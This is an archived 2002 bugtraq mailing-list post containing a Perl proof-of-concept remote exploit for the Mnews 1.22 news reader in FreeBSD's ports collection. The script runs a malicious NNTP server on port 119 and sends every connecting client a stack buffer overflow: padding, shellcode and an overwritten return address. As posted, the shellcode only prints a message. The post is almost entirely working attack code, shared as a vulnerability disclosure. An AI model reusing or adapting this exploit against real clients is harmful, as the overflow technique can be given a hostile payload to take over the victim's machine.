[25639] in bugtraq
Mnews 1.22 PoC exploit
daemon@ATHENA.MIT.EDU (zillion)
Sun Jun 2 20:35:54 2002
Date: Fri, 31 May 2002 19:37:42 -0400 (EDT)
From: zillion <zillion@snosoft.com>
To: <vuln-dev@securityfocus.com>
Cc: <bugtraq@securityfocus.com>
Message-ID: <20020531193054.T53760-100000@mail.snosoft.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
#!/usr/bin/perl -w
#
# Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
# with the 4.5-RELEASE ports collection.
#
# This exploit is pretty harmless as it only prints a small message to
# stdout (NAI?).
#
# Written by zillion[at]safemode.org (!shit)
#
# http://www.safemode.org
# http://www.snosoft.com
use IO::Socket;
$shellcode =
"\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
"\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
"\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
"\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
"\x23";
# normal \x90 nops don't work here..
$nop = "A";
$esp = 0xbfbff65e;
$off = "-70";
$size = 762;
for ($i = 0; $i < ($size - length($shellcode)); $i++) {
$buffer .= "$nop";
}
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));
printf("Starting to listen for incoming connections... buffer size
%d\n",length($buffer));
print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n");
my $sock = new IO::Socket::INET (
LocalPort => 119,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
while($cl = $sock->accept()) {
sleep 1;
print $cl "200 $buffer\n";
sleep 3;
}
